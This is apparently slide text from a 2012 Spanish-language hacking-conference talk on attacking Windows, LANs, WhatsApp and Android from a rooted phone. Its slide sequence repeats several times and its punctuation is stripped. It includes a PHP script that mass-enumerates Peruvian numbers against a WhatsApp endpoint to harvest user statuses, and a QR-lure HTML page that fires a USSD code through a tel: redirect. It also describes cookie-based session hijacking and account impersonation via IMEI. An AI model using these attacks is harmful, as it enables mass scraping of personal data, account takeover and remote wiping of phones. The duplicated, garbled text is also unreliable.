bull Utiliza tu ldquoAndroidrdquo es un gran amigo
Atacando Windows
Tool Anti (Android Network Toolkit)
httpwwwzimperiumcom
Con Anti podemos
Buscar vulnerabilidades
Auditoriacutea de passwords
Ataques de man in the middle
Ejecutar comandos en el SO
Descubrir traacutefico inseguro en la red
Atacando Windows
Atacando Windows
USO DE NMAP
SCANEO DE PUERTOS
DETECCIOacuteN DE SIST OPERATIVO
SCRIPT DE VERIFICACIOacuteN DE
VULNERABILIDADES
Atacando Windows
Atacando una red LAN
bull Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook Hotmail Twitter)
bull El coacutedigo fuente es libre httpdroidsheepde
bull Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear WTF
bull La comunidad XDA-developers sigue sacando nuevas versiones del software (httpforumxda-developerscom)
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
iquestPor queacute Android
bull Otros sistemas operativos ya no tienen participacioacuten en el
mercado (RIP ndash Blackberry)
bull Los hackers estaacuten buscando nuevos objetivos (nuevos
retos) siempre a la vanguardia
iquestPor queacute Android
bull Se pueden realizar ataques cada vez mas sigilosos (ya no es
necesario una laptop para realizar ataques)
bull Es muy comuacuten que a traveacutes de Android nos hellip
bull Conectamos a redes wireless libres
bull Accedamos a correo electroacutenico
bull Accedamos a redes sociales
bull Realicemos transacciones financieras
La agenda de hoy
Atacando SO Windows
Ataques de red LAN
Forense de traacutefico generado x Android
Android vs Metasploit
Requisitos
bull Tener el Android rooteado (super privilegios) Todas las herramientas interesantes requieren de super-privilegios
bull Analizar la mejor situacioacuten para realizar un ataque
bull Utiliza tu ldquoAndroidrdquo es un gran amigo
Atacando Windows
Tool Anti (Android Network Toolkit)
httpwwwzimperiumcom
Con Anti podemos
Buscar vulnerabilidades
Auditoriacutea de passwords
Ataques de man in the middle
Ejecutar comandos en el SO
Descubrir traacutefico inseguro en la red
Atacando Windows
Atacando Windows
USO DE NMAP
SCANEO DE PUERTOS
DETECCIOacuteN DE SIST OPERATIVO
SCRIPT DE VERIFICACIOacuteN DE
VULNERABILIDADES
Atacando Windows
Atacando una red LAN
bull Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook Hotmail Twitter)
bull El coacutedigo fuente es libre httpdroidsheepde
bull Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear WTF
bull La comunidad XDA-developers sigue sacando nuevas versiones del software (httpforumxda-developerscom)
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
iquestPor queacute Android
bull Se pueden realizar ataques cada vez mas sigilosos (ya no es
necesario una laptop para realizar ataques)
bull Es muy comuacuten que a traveacutes de Android nos hellip
bull Conectamos a redes wireless libres
bull Accedamos a correo electroacutenico
bull Accedamos a redes sociales
bull Realicemos transacciones financieras
La agenda de hoy
Atacando SO Windows
Ataques de red LAN
Forense de traacutefico generado x Android
Android vs Metasploit
Requisitos
bull Tener el Android rooteado (super privilegios) Todas las herramientas interesantes requieren de super-privilegios
bull Analizar la mejor situacioacuten para realizar un ataque
bull Utiliza tu ldquoAndroidrdquo es un gran amigo
Atacando Windows
Tool Anti (Android Network Toolkit)
httpwwwzimperiumcom
Con Anti podemos
Buscar vulnerabilidades
Auditoriacutea de passwords
Ataques de man in the middle
Ejecutar comandos en el SO
Descubrir traacutefico inseguro en la red
Atacando Windows
Atacando Windows
USO DE NMAP
SCANEO DE PUERTOS
DETECCIOacuteN DE SIST OPERATIVO
SCRIPT DE VERIFICACIOacuteN DE
VULNERABILIDADES
Atacando Windows
Atacando una red LAN
bull Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook Hotmail Twitter)
bull El coacutedigo fuente es libre httpdroidsheepde
bull Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear WTF
bull La comunidad XDA-developers sigue sacando nuevas versiones del software (httpforumxda-developerscom)
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
La agenda de hoy
Atacando SO Windows
Ataques de red LAN
Forense de traacutefico generado x Android
Android vs Metasploit
Requisitos
bull Tener el Android rooteado (super privilegios) Todas las herramientas interesantes requieren de super-privilegios
bull Analizar la mejor situacioacuten para realizar un ataque
bull Utiliza tu ldquoAndroidrdquo es un gran amigo
Atacando Windows
Tool Anti (Android Network Toolkit)
httpwwwzimperiumcom
Con Anti podemos
Buscar vulnerabilidades
Auditoriacutea de passwords
Ataques de man in the middle
Ejecutar comandos en el SO
Descubrir traacutefico inseguro en la red
Atacando Windows
Atacando Windows
USO DE NMAP
SCANEO DE PUERTOS
DETECCIOacuteN DE SIST OPERATIVO
SCRIPT DE VERIFICACIOacuteN DE
VULNERABILIDADES
Atacando Windows
Atacando una red LAN
bull Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook Hotmail Twitter)
bull El coacutedigo fuente es libre httpdroidsheepde
bull Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear WTF
bull La comunidad XDA-developers sigue sacando nuevas versiones del software (httpforumxda-developerscom)
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
